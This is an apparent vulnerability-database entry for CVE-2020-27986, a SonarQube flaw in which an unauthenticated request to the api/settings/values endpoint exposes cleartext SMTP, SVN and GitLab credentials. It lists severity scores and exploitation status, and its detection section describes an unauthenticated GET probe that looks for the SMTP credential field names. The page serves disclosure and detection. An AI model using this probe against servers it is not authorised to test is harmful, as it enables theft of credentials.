cbcvebase.
CVE-2020-27986
published 2020-10-28

CVE-2020-27986: SonarQube 8.4.2.36762 allows remote attackers to discover cleartext SMTP, SVN, and GitLab credentials via the api/settings/values URI. NOTE: reportedly, the…

PriorityP181high7.5CVSS 3.1
AVNACLPRNUINSUCHINAN
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
16.18%
96.5th percentile
SonarQube 8.4.2.36762 allows remote attackers to discover cleartext SMTP, SVN, and GitLab credentials via the api/settings/values URI. NOTE: reportedly, the vendor's position for SMTP and SVN is "it is the administrator's responsibility to configure it.

Affected

2 ranges
VendorProductVersion rangeFixed in
gitlabgitlab
sonarsourcesonarqube

Detection & IOCsextracted from sources · hover to see the quote

url/api/settings/values
otheremail.smtp_host.secured
  • Send an unauthenticated HTTP GET request to /api/settings/values and inspect the response body for the presence of all four strings: 'email.smtp_host.secured', 'email.smtp_password.secured', 'email.smtp_port.secured', and 'email.smtp_username.secured' — their co-occurrence confirms cleartext credential exposure.
  • A successful exploit returns HTTP 200 with all four SMTP credential field names in the JSON body, indicating no authentication is required to access the settings API endpoint.

CVSS provenance

nvdv3.17.5HIGHCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:P/I:N/A:N
vulncheck7.5HIGH
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.